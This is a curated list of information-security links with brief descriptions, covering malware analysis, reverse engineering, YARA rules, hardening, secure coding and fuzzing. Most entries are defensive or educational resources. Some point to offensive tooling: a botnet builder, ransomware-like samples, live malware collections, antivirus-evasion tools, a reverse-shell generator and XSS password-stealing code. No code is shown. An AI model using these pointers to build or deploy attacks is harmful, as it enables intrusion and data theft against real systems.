*Please contribute through pull requests- ;)
Another great list: awesome-incident-response
- Nice list here by Cert.BR
- Practical Cryptography for Developers, github
- The Book of Secret Knowledge
- Security Engineering — Third Edition
- The Cyber Plumber's Handbook
- FIRST
- SANS Pen-Testing Resources: Downloads
- Some list of security projects
- APT & CyberCriminal Campaign Collection
- Applying DevOps Principles in Incident Response
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
- Shodan: is the world's first search engine for Internet-connected devices. Shodan 2000
- ATTACK-Tools: Utilities for MITRE™ ATT&CK
- hacking-tutorials
- crypto: Lecture notes for a course on cryptography
- tink: Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- SPLOITUS: Exploit search engine.
- Vulmon: Vulmon is a vulnerability search engine.
- CIS SecureSuite® Membership
- CRYPTO101: Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels.
- Pagerduty Incident Response: This documentation covers parts of the PagerDuty Incident Response process.
- security-training: Public version of PagerDuty's employee security training courses.
- incident-response-docs: PagerDuty's Incident Response Documentation.
- SMHasher is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions. another repo
- CPDoS: Cache Poisoned Denial of Service
- CORS'ing a Denial of Service via cache poisoning
- global-irt: Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
- cacao: OASIS CACAO TC: Official repository for work of the CACAO TC
- cti-documentation
- The 4th in the 5th: Temporal Aspects of Cyber Operations
- SOCless: The SOCless automation framework
- atc-react : A knowledge base of actionable Incident Response techniques
- Open CSIRT Foundation - SIM v3 Model and SIM3 Self Assessment.
- Global Forum on Cyber Expertise (GFCE).
- my-infosec-awesome.
- MD5 Decryption
- SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
- Some CVEs stuff and links here and in here
- MikroTik search on shodan.
- TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
- cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
- dorkbot: Command-line tool to scan Google search results for vulnerabilities.
- Assembly Language / Reversing / Malware Analysis - resources
- Great online course by MalwareUnicorn
- Some other botnets list
- IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
- Digital Certificates Used by Malware
- Signed Malware – The Dataset
- Malware Sample Sources for Researchers
- Indicators: Champing at the Cyberbit
- Limon - Sandbox for Analyzing Linux Malwares
- A Dynamic Binary Instrumentation framework based on LLVM
- Framework for building Windows malware, written in C++
- binary ninja
- Analyzing a New macOS DNS Hijacker: OSX/MaMi
- A PoC "malware" application with good intentions that aims to stress your anti-malware system: al-khaser
- Great analysis of mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10
- Chaos: a Stolen Backdoor Rising Again
- Malware Indicators of Compromise (IOCs)
- Puszek:Yet another LKM rootkit for Linux. It hooks syscall table.
- Joe Sandbox Cloud is a deep malware analysis platform which detects malicious files - API Wrapper.
- EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
- Malware web and phishing investigation by Decent Security.
- A collection of tools for working with TrickBot
- Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
- RegRipper version 2.8 (source code)
- makin - reveal anti-debugging and anti-VM tricks.
- TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
- colental/byob: BYOB (Build Your Own Botnet), another byob
- Source Code for Exobot Android Banking Trojan Leaked Online
- Pegasus: analysis of network behavior
- Ramnit’s Network of Proxy Servers
- snake: a malware storage zoo
- A malware analysis kit for the novice
- malware-ioc: Indicators of Compromises (IOC) of our various investigations
- pftriage: Python tool and library to help analyze files during malware triage and analysis.
- imaginaryC2: Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
- When a malware is more complex than the paper.
- Vba2Graph: Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.
- malwoverview: Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample.
- SECT CTF 2018 :: Gh0st, More Smoked Leet Chicken
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- Linux.Malware: Additional Material for the Linux Malware Paper
- PHP Malware Examination
- Analysis of Linux.Haikai: inside the source code
- Cylance vs. MBRKiller Wiper Malware.
- Deep Analysis of TrickBot New Module pwgrab
- multiscanner: Modular file scanning/analysis framework.
- FCL: FCL (Fileless Command Lines) - Known command lines of fileless malicious executions.
- Mac malware combines EmPyre backdoor and XMRig miner
- The Full Guide Understanding Fileless Malware Infections
- 'Injection' Without Injection
- Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample.
- pafish: Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
- Thunderstrike2 details: This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard.
- Malboxes: a Tool to Build Malware Analysis Virtual Machines, github
- Triton is the world’s most murderous malware, and it’s spreading
- Cloak and Dagger — Mobile Malware Techniques Demystified
- IceBox: Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility.
- Malware Development:
- Command and Control via TCP Handshake
- Joel Sandbox Analysis Report wdeQEksXgm
- emotet: Daily Emotet IoCs and Notes for 09/18/19
- Aleph: OpenSource /Malware Analysis Pipeline System
- Aleph: File Analysis Pipeline
- Anti-VM Technique with MSAcpi_ThermalZoneTemperature, powershell
- Burned Again by Flame 2.0
- AMSI as a Service — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for it’s ability to make file-less malware visible to AV engines.
- A collection of x64dbg scripts. Feel free to submit a pull request to add your script.
- multiscanner: Modular file scanning/analysis framework
- CAPA: The FLARE team's open-source tool to identify capabilities in executable files. capa-rules
- DRAKVUF Sandbox - automated hypervisor-level malware analysis system.
- Unprotect: The search engine about Malware Evasion Techniques
- HiJackThis Fork v3: A free utility that finds malware, adware and other security threats.
- FRITZFROG: A NEW GENERATION OF PEER-TO-PEER BOTNETS. detection script
- Tracking A Malware Campaign Through VT
- speakeasy: Windows kernel and user mode emulation.
- malware analysis and machine learning If you are new to machine learning and want to start learning about building models to classify malware, I recommend the following
- GhostDNSbusters: Illuminating GhostDNS Infrastructure
- The Tetrade: Brazilian banking malware goes global
- Is macOS under the biggest malware attack ever?: EvilQuest/ThiefQuest malware.
- Hybrid Analysis
- MosaicRegressor: Lurking in the Shadows of UEFI. Technical details
- Evading Static Machine Learning Malware Detection Models – Part 1: The Black-Box Approach
- ember: The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers.
- Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering)
- Coldfire: Golang malware development library
- pei, the PE Injector - Inject code on 32-bit and 64-bit PE executables
- Boa release is an experimental Javascript lexer, parser and compiler written in Rust.
- midrashim: x64 ELF infector written in Assembly
- New evasion techniques found in web skimmers
- digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process. paypal endpoint called via cors-anywhere, stega-loader, paypal-cors-deob-good.js, paypal-cors-deob-with-comments.js, fake-paypal.html
- Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
- Mac Malware
- virii: Collection of ancient computer virus source codes
- Detricking TrickBot Loader: TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. decoder, tweet
- Analysis of Emotet v4
- Current Emotet Epoch 2 C2 as of 2019-09-26 07:54 US/Eastern
- abuse.ch Feodo Tracker Botnet C2 IP Blocklist
- simple_ransomware: this script isn't ransomware, it's just script collect all your system files and encrypt it, Can be considered it a simple ransomware
- Mirai "Batkek"
- FinFisher Filleted 🐟, a triage of the FinSpy (macOS) malware
- the Emerald Connection: EquationGroup collaboration with Stuxnet
- Ryuk’s Return
- Ryuk Ransomware: Extensive Attack Infrastructure Revealed
- Android-Malware-Samples: Android Malware Samples
- TRAFFIC ANALYSIS EXERCISE - OMEGACAST
- Malware Samples: Malware samples and other artifacts
- A repository of LIVE malwares for your own joy and pleasure: theZoo
- malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
- Beginner Malware Reversing Challenges, by MalwareTech. repo
- MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
- C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
- LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
- MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
- What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.
- Ransomware decryption tool
- Schroedinger’s Pet(ya)
- Player 3 Has Entered the Game: Say Hello to 'WannaCry'
- WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
- Ransomware Overview
- Analyzing GrandSoft Exploit Kit and code
- Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
- hidden-tear: It's a ransomware-like file crypter sample which can be modified for specific purposes.
- Tracking REvil: This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe.
- After the ransom was paid, the attackers even provided some bonus security advice!
- Phirautee: A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
- Sophisticated new Android malware marks the latest evolution of mobile ransomware
- Raccine: A Simple Ransomware Vaccine
- Brazilian Justice Court Ransomware: Another piece in the Puzzle
- Avast open-sources its machine-code decompiler
- Morris worm
- make a process unkillable?! (windows 10)
- Attack inception: Compromised supply chain within a supply chain poses new risks – Microsoft Secure.
- Curtis' Blog: Bypassing Next Gen AV During a Pentest
- Inception: Provides In-memory compilation and reflective loading of C# apps for AV evasion.
- Invoke-NeutralizeAV: Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting.
- BinariesThatDoesOtherStuff.
- Circlean: USB key cleaner.
- The ELF Virus Writing HOWTO.
- mcreator: Encoded Reverse Shell Generator With Techniques To Bypass AV's.
- metame: is a simple metamorphic code engine for arbitrary executables.
- rustdsplit: At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
- Virus Total API in Python
- rustdsplit: At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this.
- IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
- Turla: In and out of its unique Outlook backdoor
- QMKhuehuebr: Trying to hack into keyboards
- “VANILLA” malware: vanishing antiviruses by interleaving layers and layers of attacks
- A Mix of Python & VBA in a Malicious Word Document
- MalwareAnalysisForHedgehogs: Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge.
- 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
- EMOTET: EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
- (pt-br) Fundamentos de Engenharia Reversa.
- Dangers of the Decompiler
- RE guide for beginners: Methodology and tools
- REDasm: Crossplatform, interactive, multiarchitecture disassembler
- Reversing ARM Binaries
- Programmer De-anonymization from Binary Executables
- syntia: Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
- Reverse engineering WhatsApp Web
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
- Reverse Engineering for Beginners
- VivienneVMM: VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
- Xori: Custom disassembly framework
- rattle: Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts.
- starshipraider: High performance embedded systems debug/reverse engineering platform
- GBA-IDA-Pseudo-Terminal: IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
- binja-ipython: A plugin to integrate an IPython kernel into Binary Ninja.
- PySameSame: This is a python version of samesame repo to generate homograph strings
- Reversing a Japanese Wireless SD Card From Zero to Code Execution
- Practical-Reverse-Engineering-using-Radare2: Training Materials of Practical Reverse Engineering using Radare2
- IDA Pro:
- idaemu: idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro.
- lighthouse: Code Coverage Explorer for IDA Pro & Binary Ninja
- IDAPro Cheat Sheet
- LIEF: Library to Instrument Executable Formats (github)
- pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy
- DEBIN: Predicting Debug Information in Stripped Binaries
- Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
- Manticore: Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. manticore: Symbolic execution tool
- Beam me up, CFG.: Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- Getting Started with Frida Tools
- Frida hooking android :part 1, part 2, part 3, part 4 and part 5
- PBA - Analysis Tools: My own versions from the programs of the book "Practical Binary Analysis"
- functrace: is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
- Signature-Base: signature-base is the signature database for my scanners LOKI and SPARK Core.
- Generic Anomalies: Detects an embedded executable in a non-executable file
- Virtuailor: IDAPython tool for C++ vtables reconstruction.
- Linux Reverse Engineering CTFs for Beginners.
- execution-trace-viewer: Tool for viewing and analyzing execution traces
- Reverse Engineering of a Not-so-Secure IoT Device
- Python for Reverse Engineering 1: ELF Binaries
- Kaitai Struct: A new way to develop parsers for binary structures.
- findLoop: find possible encryption/decryption or compression/decompression code.
- Reverse Engineering 'A Link to the Past (GBA)' ep 1
- wiggle: The concepting self hosted executable binary search engine.
- Python for Reverse Engineering 1: ELF Binaries
- uncompyle6: A cross-version Python bytecode decompiler
- Decompyle++: C++ python bytecode disassembler and decompiler
- Reverse engineering Go binaries using Radare 2 and Python
- bearparser
- EFISwissKnife: An IDA plugin to improve (U)EFI reversing.
- Reverse-engineering precision op amps from a 1969 analog computer
- CPU Adventure – Unknown CPU Reversing: We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- pev: pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries.
- PEDA: Python Exploit Development Assistance for GDB.
- Sourcetrail: free and open-source cross-platform source explorer.
- Qiling Framework: Qiling Advanced Binary Emulation Framework. repo
- Glasgow Debug Tool: Scots Army Knife for electronics
- Tales Of Binary Deobfuscation - Part 1
- evilquest_deobfuscator: EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. evilquest_stats: Small utility to hash EvilQuest code and cstrings sections.
- mona site. mona: is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes.
- windbglib: Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
- VX Underground
- MalwareSourceCode: Collection of malware source code for a variety of platforms in an array of different programming languages.
- VXUG-Papers: Research code & papers from members of vx-underground.
- (pt-br) Como automaticamente atachar um processo a um debugger.
- HyperDbg Debugger: The Source Code of HyperDbg Debugger
- The HT Editor: A file editor/viewer/analyzer for executables.
- XLMMacroDeobfuscator: Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
- decompile_java, using CFR - another java decompiler.
- NoVmp: A static devirtualizer for VMProtect x64 3.x powered by VTIL.
- Awesome IDA, x64DBG & OllyDBG plugins: A curated list of IDA x64DBG and OllyDBG plugins.
- Yara-Rules: Repository of yara rules
- Repository containing Indicators of Compromise and Yara rules
- YARA in a nutshell
- yara: The pattern matching swiss knife
- mkYARA: Writing YARA rules for the lazy analyst (github)
- Yara-Rules: Repository of YARA rules made by McAfee ATR Team.
- ReversingLabs YARA Rules
- YaraHunts: Random hunting ordiented yara rules
- YARA Rules for ProcFilter
- ThreatHunting
- yara-validator: Validates yara rules and tries to repair the broken ones.
- Vim Syntax Highlighting for YARA Rules: A Vim syntax-highlighting file for YARA rules covering YARA 4.0
- ghidra-firmware-utils: Ghidra utilities for analyzing firmware
- dragondance: Binary code coverage visualizer plugin for Ghidra
- Decompiler Analysis Engine: Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable.
- Working With Ghidra's P-Code To Identify Vulnerable Function Calls
- GhIDA: Ghidra decompiler for IDA Pro.
- Ghidraaas: Ghidra as a Service
- SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering. repo
- GhidraX64Dbg: Extract annoations from Ghidra into an X32/X64 dbg database.
- Reverse Engineering Go Binaries with Ghidra
- Introduction to Reverse Engineering with Ghidra: A Four Session Course
- Inject code into running Python processes
- malspider: Malspider is a web spidering framework that detects characteristics of web compromises.
- AIL-framework: AIL framework - Analysis Information Leak framework:
- Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)
- 9 Kubernetes Security Best Practices Everyone Must Follow
- BlueWars: Capture The Flag Defensivo que aconteceu na H2HC
- CCAT: Cisco Config Analysis Tool
- Ciderpress: Hardened wordpress installer
- debian-cis: PCI-DSS compliant Debian 7/8 hardening.
- Endlessh: an SSH tarpit.
- ERNW Repository of Hardening Guides: This repository contains various hardening guides compiled by ERNW for various purposes.
- fero: YubiHSM2-backed signing server
- FirewallChecker: A self-contained firewall checker
- Get SSH login notification on Telegram
- Hardentools is a utility that disables a number of risky Windows features.
- How To Secure A Linux Server: An evolving how-to guide for securing a Linux server.
- Implementing Least-Privilege Administrative Models
- Iptables Essentials: Common Firewall Rules and Commands.
- iptables-essentials: Iptables Essentials: Common Firewall Rules and Commands.
- kconfig-hardened-check: A tool for checking the hardening options in the Linux kernel config
- Keyringer: encrypted and distributed secret sharing software
- Keystone Project. Github: Keystone Enclave
- linux-hardened: Minimal supplement to upstream Kernel Self Protection Project changes.
- List of sites with two factor auth
- nftables: nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework.
- Nice article with a lot of resources: Common approaches to securing Linux servers and what runs on them.
- opmsg: is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
- prowler: AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for AWS guide.
- reconbf: Recon system hardening scanner
- Sarlacc is an SMTP server that I use in my malware lab to collect spam from infected hosts.
- Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
- Secure Secure Shell by stribika
- Securing Docker Containers. The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.
- securityonion-docs
- security.txt: A proposed standard which allows websites to define security policies.
- See your site config with Hardenize
- Set up two-factor authentication for SSH on Fedora
- solo-hw: Hardware sources for Solo
- ssh-auditor: The best way to scan for weak ssh passwords on your network
- Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
- The Practical Linux Hardening Guide: 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress.
- tls-what-can-go-wrong: TLS - what can go wrong?
- upvote: A multi-platform binary whitelisting solution
- Using a Hardened Container Image for Secure Applications in the Cloud
- Zero-knowledge attestation
- RHEL Like systems:
- CentOS7 Lockdown
- RHEL7-CIS: Ansible RHEL 7 - CIS Benchmark Hardening Script
- cisecurity: Configures Linux systems to Center for Internet Security Linux hardening standard.
- bdshemu: The Bitdefender shellcode emulator
- IPv6 Security Best Practices
- auditd: Best Practice Auditd Configuration.
- A lot of good posts by geek flare:
- CaCerts
- List of free rfc3161 servers. TSA Servers
- certstream-server: Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir
- Apache:
- Apache Security by Ivan Ristić
- dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
- A new security header: Feature Policy
- How do I prevent apache from serving the .git directory?
- Nginx:
- 20 Essential Things to Know if You’re on Nginx Web Server
- Nginx C function: Create your desired C application on top of nginx module
- NGINX config for SSL with Let's Encrypt certs
- How to Configure Nginx SSL Certifcate Chain
- PHP:
- Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- snuffleupagus: Security module for php7 - Killing bugclasses and virtual-patching the rest!
- FOPO-PHP-Deobfuscator: A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
- Decode.Tools: Decode PHP Obfuscator by FOPO
- A new security header: Feature Policy
- CAA Mandated by CA/Browser Forum
- dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
- ENVOY is an open source edge and service proxy, designed for cloud-native applications. code
- ghp: A simple web server for serving static GitHub Pages locally
- LEAR: Linux Engine for Asset Retrieval
- NFHTTP: A cross platform C++ HTTP library that interfaces natively to other platforms.
- Security/Server Side TLS by Mozilla
- security.txt: A proposed standard which allows websites to define security policies.
- urlscan.io: A sandbox for the web
- Search if your credentials where leaked: Cr3dOv3r
- pw-pwnage-cfworker: Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
- XSS Exploit code for retrieving passwords stored in a Password Vault
- login_duress: A BSD authentication module for duress passwords
- XSStrike: Most advanced XSS detection suite.
- Was my password leaked? pwndb: Search for creadentials leaked on pwndb.
- bitwarden_rs: Unofficial Bitwarden compatible server written in Rust
- pcfg_cracker: Probabilistic Context Free Grammar (PCFG) password guess generator
- Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
- Introducing the Qubes U2F Proxy
- YubiKey-Guide: Guide to using YubiKey for GPG and SSH
- Using a Yubikey for GPG and SSH: Sebastian Neef - 0day.work
- PIN and Management Key
- Improve login security with challenge-response authentication
- URU Card: Arduino FIDO2 Authenticator. uru-card
- YubiKey at Datadog
- This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.
- yubikey-ssh-setup
- Hardening C/C++ Programs Part II: Executable-Space Protection and ASLR
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- sanitizers
- Gitian is a secure source-control oriented software distribution method.
- Canary:Input Detection and Response
- Canarytokens by Thinkst, Quick, Free, Detection for the Masses
- CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
- How to Know if Someone Access your Files with Canary Tokens
- Wycheproof: Project Wycheproof tests crypto libraries against known attacks.
- Web App Security 101: Keep Calm and Do Threat Modeling
- SSL/TLS for dummies:
- heaphopper: HeapHopper is a bounded model checking framework for Heap-implementations
- Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
- SEI CERT C Coding Standard: The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
- Safe C Library: The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
- Field Experience With Annex K — Bounds Checking Interfaces
- TSLint: An extensible linter for the TypeScript language.
- rubocop: A Ruby static code analyzer and formatter, based on the community Ruby style guide.
- Librando: transparent code randomization for just-in-time compilers
- Checked C: Making C Safe by Extension. github
- Practical case: Buffer Overflow 0x01
- pigaios: A tool for diffing source codes directly against binaries. slides
- pigaios: A tool for diffing source codes directly against binaries. slides
- A Git Horror Story: Repository Integrity With Signed Commits. How to use git securely (signing commits)
- An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
- Tooling for verification of PGP signed commits
- tlse: Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
- tinyalloc: malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
- Sandboxed API: Sandboxed API automatically generates sandboxes for C/C++ libraries
- HACL*: a formally verified cryptographic library written in F*
- Villoc: Villoc is a heap visualisation tool, it's a python script that renders a static html file.
- How C array sizes become part of the binary interface of a library
- MazuCC: A minimalist C compiler with x86_64 code generation
- When the going gets tough: Understanding the challenges with Product commoditization in SCA.
- huskyCI: huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
- (pt-br) GTER 47 | GTS 33 - Dia 2 (parte 1): nice talk by Daniel Carlier and Silvia Pimpão.
- HTTP Security Headers - A Complete Guide
- SAFECode: is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
- Security Code Review 101
- Elliptic Curve Cryptography Explained
- Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
- How to Process Passwords as a Software Developer
- QL: The libraries and queries that power CodeQL and LGTM.com
- Sendy is Insecure: How Not to Implement reCAPTCHA
- Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2
- DevSecOps: Securing Software in a DevOps World
- GitGuardian Documentation and Resources: Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian. python API Client
- Vuln Cost - Security Scanner for VS Code: Find security vulnerabilities in open source npm packages while you code.
- Most Popular Analysis Tools by Programming Language
- Deepsource: tool that analyzes your repository.
- git-wild-hunt: A tool to hunt for credentials in github wild AKA git*hunt
- shhgit: Ah shhgit! Find GitHub secrets in real time
- A Graduate Course in Applied Cryptography
- KaiMonkey: Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code.
- OWASP Broken Web Applications Project. OWASP BWA repository files.
- dvna: Damn Vulnerable NodeJS Application
- Static analysis powered security scanner for your terraform code
- Scan (skæn) is a free open-source security audit tool for modern DevOps teams. sast-scan: A Free & Open Source DevSecOps Platform.
- secDevLabs: A laboratory for learning secure web development in a practical manner.
- Security impact of a misconfigured CORS implementation
- Which Security Risks Do CORS Imply?
- Cross-Origin Resource Sharing (CORS)
- Secure Modular Runtimes
- WebSecurity Academy
- Projects/OWASP Node js Goat Project, repo
- Prototype pollution – and bypassing client-side HTML sanitizers
- Understanding the CSRF Vulnerability (A Beginner’s Guide)
- VulnyCode: PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
- OWASP Web Security Testing Guide: The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services. portal
- A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs. paper/video
- SCYTHE's Community Threats Repository: Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here.
- Generating Software Tests (github)
- afl-unicorn: Fuzzing Arbitrary Binary Code
- Regaxor: A regular expression fuzzer
- BrokenType: TrueType and OpenType font fuzzing toolset
- Dizzy-legacy: Network and USB protocol fuzzing toolkit.
- Start-Hollow.ps1: My musings with PowerShell
- auditd-attack: A Linux Auditd rule set mapped to MITRE's Attack Framework
- Dizzy-legacy: Network and USB protocol fuzzing toolkit.
- BFuzz: Fuzzing Browsers
- Structure-Aware Fuzzing with libFuzzer with fuzzer test suite
- Fuzzilli: A JavaScript Engine Fuzzer.
- Materials from Fuzzing Bay Area meetups.
- javafuzz: Javafuzz is coverage-guided fuzzer for testing Java packages.
- onefuzz: A self-hosted Fuzzing-As-A-Service platform.
- Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
- ffuf: Fast web fuzzer written in Go
- RESTler finds security and reliability bugs through automated fuzzing. RESTler: is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. REST API Fuzz Testing (RAFT): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
- The Web API Checklist: 43 Things To Think About When Designing, Testing, and Releasing your API
- API-Security-Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- REST API Checklist
- Your Comprehensive Web API Design Checklist
- API Security Testing: Rules And Checklist
- API Security Testing - How to Hack an API and Get Away with It:
- API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
- Istio: An open platform to connect, manage, and secure microservices.
- How to contact Google SRE: Dropping a shell in cloud SQL
- hack-requests: The hack-requests is an http network library for hackers
- REST API Testing Tutorial: Sample Manual Test Case
- REST Security Cheat Sheet: CheatSheetSeries
- Penetration Testing RESTful Web Services
- RESTful web services penetation testing
- Astra: Automated Security Testing for REST API’s
